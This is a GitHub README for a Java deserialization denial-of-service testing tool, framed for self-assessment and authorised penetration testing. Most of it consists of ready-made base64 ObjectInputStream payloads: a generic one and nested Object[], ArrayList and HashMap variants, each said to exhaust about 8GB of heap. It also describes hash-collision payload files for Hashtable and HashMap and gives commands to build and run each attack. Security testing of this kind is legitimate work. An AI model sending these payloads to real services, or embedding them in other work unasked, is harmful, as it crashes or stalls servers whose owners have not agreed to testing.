Skip to content

topolik/ois-dos

Repository files navigation

ObjectInputStream DoS

Project to safely test Java Serialization vulnerability using DoS (OutOfMemoryError)

Provided as-is, only for self-assessment, agreed pen-testing purposes, etc.

Basic Scenarios

  • Generic Heap DoS inside ObjectInputStream
  • Heap DoS using nested Object[], ArrayList and HashMap
  • Collision attack on Hashtable
  • Collision attack on HashMap (Oracle Java 1.7)

Payloads for 8GB heap consumption

Should be enough to test the vulnerability in most app servers.

Generic (9 bytes):

rO0ABX1////3

Nested Object[] (44 bytes):

rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cH////c=

Nested ArrayList (67 bytes):

rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHB////3dwR////3cHBwcHBwcHBwcA==

Nested HashMap (110 bytes):

rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABBAAAAAc3EAfgAAP0AAAAAAAAx3CAAAABBAAAAAcHB4cHg=

Payloads for collision attacks

  • Hashtable: see hashtable.collisions.txt file (1.2M), using 10k entries for collision, deserialization takes 40s
  • HashMap: (1.7 only) see hashmap.collisions.txt file (800k), using 10k entries for collision, deserialization takes 50s

Build & Run

mvn clean package

java -Xmx25g -jar target/oisdos-1.0.jar

E.g:

java -Xmx25g -jar target/oisdos-1.0.jar Generic

java -Xmx25g -jar target/oisdos-1.0.jar ArrayListHeap

java -Xmx25g -jar target/oisdos-1.0.jar HashtableCollisions 5000

Other info

  • Licence: MIT
  • Already reported to Oracle (in 2015) with "won't fix" response